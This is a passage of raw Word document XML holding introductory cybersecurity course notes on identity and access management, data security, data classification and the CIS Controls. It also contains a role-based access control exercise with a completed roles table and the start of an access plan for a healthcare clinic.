        <w:t xml:space="preserve"> Secures and monitors access to privileged accounts.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In the context of the e-commerce company you mentioned earlier, strong IAM is essential for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Protecting customer data (PII, payment information)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Preventing unauthorized access to systems</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Ensuring compliance with regulations like PCI DSS</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Managing employee access to resources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IAM is a foundational element of a strong cybersecurity posture for any organization, especially</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What is data security , Data Classification, CIS Security Controls?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These are all critical aspects of cybersecurity, especially for organizations that handle sensitive data. Here's a breakdown of each:</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1. Data Security</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="480" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data security is the process of protecting data from unauthorized access, use, disclosure, disruption, modification, or destruction. It encompasses all measures taken to ensure the confidentiality, integrity, and availability of data.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Key Components:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Confidentiality:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensuring that only authorized individuals can access data.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Integrity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guaranteeing that data is accurate, complete, and consistent.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Availability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensuring that data is accessible to authorized users when needed.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="480" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data security is essential for protecting sensitive information, maintaining business operations, and complying with regulations.  </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2. Data Classification</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="480" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data classification is the process of categorizing data based on its sensitivity, value, and criticality. This helps organizations determine the appropriate level of protection for different types of data.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Common Classifications:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Confidential:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Highly sensitive data that requires the strongest protection (e.g., financial records, customer data, trade secrets).  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Restricted:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data that is not publicly available and requires a moderate level of protection (e.g., employee records, internal documents).</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Public:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data that can be freely shared with the public (e.g., marketing materials, website content).  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="480" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data classification helps organizations prioritize security efforts, apply appropriate security controls, and comply with data protection regulations.  </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3. CIS Security Controls</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="480" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> The CIS Critical Security Controls (CIS Controls) are a set of prioritized cybersecurity best practices developed by the Center for Internet Security (CIS). They provide a framework for organizations to improve their cybersecurity defenses and mitigate th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">e most common cyber threats.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Key Features:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Prioritized:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> The controls are prioritized based on their effectiveness in preventing and mitigating attacks.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Actionable:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> They provide specific, actionable guidance for implementing security measures.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Widely Applicable:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> They can be adapted to organizations of all sizes and types.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="480" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> The CIS Controls offer a practical and effective approach to improving cybersecurity posture and reducing the risk of cyberattacks.  </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Relationship Between These Concepts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Data security, data classification, and the CIS Controls are closely related. Data classification informs data security policies and procedures, helping organizations determine the appropriate level of protection for different types of data. The CIS Contro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ls provide a framework for implementing security measures that protect data and ensure its confidentiality, integrity, and availability.  </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By effectively implementing these concepts, organizations can establish a robust security posture and protect their valuable data assets.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Exercise</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Scenario</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Assume you are the IT administrator of a medium-sized organization. The organization is planning to implement an RBAC system to manage access to its digital resources effectively. You have been tasked with the job of defining roles for the employees and as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">signing the appropriate access permissions.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The company consists of the following departments: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Management: This includes the CEO, Directors, and Managers who need access to most company resources.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 The finance team needs access to accounting systems and sensitive financial data.</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 The HR team requires access to employee records, payroll systems, and recruitment tools.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 The IT team needs to access nearly all systems for maintenance and troubleshooting but should not access sensitive financial data.</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 The sales team needs access to the customer relationship management system, sales data, but not to internal or financial systems.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Instructions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Follow the instructions given below to develop an RBAC system for your organization:</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Identify and describe the roles you would create in the RBAC system.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For each role, list the types of data access they should have, based on their department. Don’t forget to share appropriate reasoning for your choices.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="360" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Role-Based Access Control (RBAC) System</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Roles and Access Permissions</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95"/>
        <w:gridCol w:w="1285"/>
        <w:gridCol w:w="2635"/>
        <w:gridCol w:w="3145"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="500"/>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center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Role</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center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Department</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center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Access</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center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Reasoning</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="216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Executive Management</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Management</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Access to all company data and systems, including financial and employee data.</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Executives require a comprehensive view of the organization for decision-making and oversight. This role would be reserved for the CEO, Directors, and other key decision-makers.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="243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 Manager</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Access to accounting systems, financial reports, and sensitive financial data. Restricted access to HR and IT systems.</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 managers are responsible for managing the company's finances and require access to sensitive financial information. They may need limited access to HR and IT systems for cross-departmental collaboration.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="216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 Manager</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Access to employee records, payroll systems, and recruitment tools. Restricted access to finance and IT systems.</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 managers handle sensitive employee information and manage payroll and recruitment processes. They may need limited access to finance and IT systems for cross-departmental collaboration.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="243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 Administrator</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Access to nearly all systems for maintenance and troubleshooting. Restricted access to sensitive financial data.</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 administrators are responsible for maintaining and troubleshooting all IT systems. They need broad access to ensure the smooth operation of systems but should not have access to sensitive financial information.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="216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 Manager</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Access to customer relationship management (CRM) system, sales data, and marketing materials. Restricted access to finance, HR, and IT systems.</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 managers focus on sales activities and customer interactions. They primarily need access to sales-related data and tools. Access to other departments' systems should be limited.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2435"/>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 Representative</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Similar access to Sales Manager, but potentially with further restrictions depending on seniority and responsibilities.</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Sales representatives need access to customer data, sales tools, and marketing materials. Their access may be more limited compared to sales managers, depending on their individual roles and responsibilities.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1880"/>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 Clerk</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Limited access within finance systems, focused on data entry and report generation. No access to highly sensitive financial information.</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Finance clerks support the finance team with data entry and reporting tasks. Their access should be limited to the specific systems and data required for their tasks.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1880"/>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 Clerk</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Limited access within HR systems, focused on data entry and basic HR tasks. No access to highly sensitive employee information.</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HR clerks support the HR team with data entry and basic HR tasks. Their access should be limited to the specific systems and data required for their tasks.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1880"/>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 Technician</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Limited access within IT systems, focused on specific technical tasks or support functions. No access to sensitive financial or employee data.</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IT technicians assist with specific technical tasks or provide support to end-users. Their access should be limited to the systems and data relevant to their area of expertise.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1880"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="149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Employee</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="128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All Departments</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="263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Basic access to company email, calendar, and shared drives. Limited access to departmental systems based on their role.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3145" w:type="dxa"/>
            <w:vAlign w:val="top"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>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All employees require basic access to communication and collaboration tools. Their access to departmental systems should be determined by their specific roles and responsibilities.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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ASSIGNMENT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In this assignment, you will develop a comprehensive access management and data security plan for a hypothetical organization.</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Choose an Organization: Pick any type of organization. Describe briefly what kind of data they might handle.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Develop Access Management: Identify three main roles in your organization that will require access to data. State what type of data each role can access.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Specify Data Security Measures: List three data security measures that the organization should use. Explain why you chose each one.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Draft a Response Plan: Outline a simple three-step plan for the organization to follow if there's a data breach.</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Develop the response plan on a Google Doc (up to 3-pages long). Once done, post your response plan on Discord for any peer feedback.</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Organization:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Healthcare Clinic</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This clinic handles a variety of sensitive patient data, including:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Personal Information: Names, addresses, contact details, dates of birth, social security numbers.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Medical Records: Diagnoses, treatments, medications, allergies, lab results, imaging reports.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Insurance Information: Insurance provider, policy numbers, billing information.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Financial Information: Payment details, credit card information (if applicable).</w:t>
        <w:b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Access Management</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Role 1: Physician</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Data Access: Full access to patient medical records, including history, diagnoses, treatment plans, and prescriptions. Limited access to patient personal and insurance information as necessary for treatment and billing. No access to other patients' medical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> records or financial data.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Role 2: Nurse</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Data Access: Access to patient medical records relevant to their assigned patients and tasks, including vital signs, medications, and allergies. Limited access to patient personal and insurance information as needed. No access to financial data or records </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">of patients they are not directly involved with.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Role 3: Administrative Staff</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
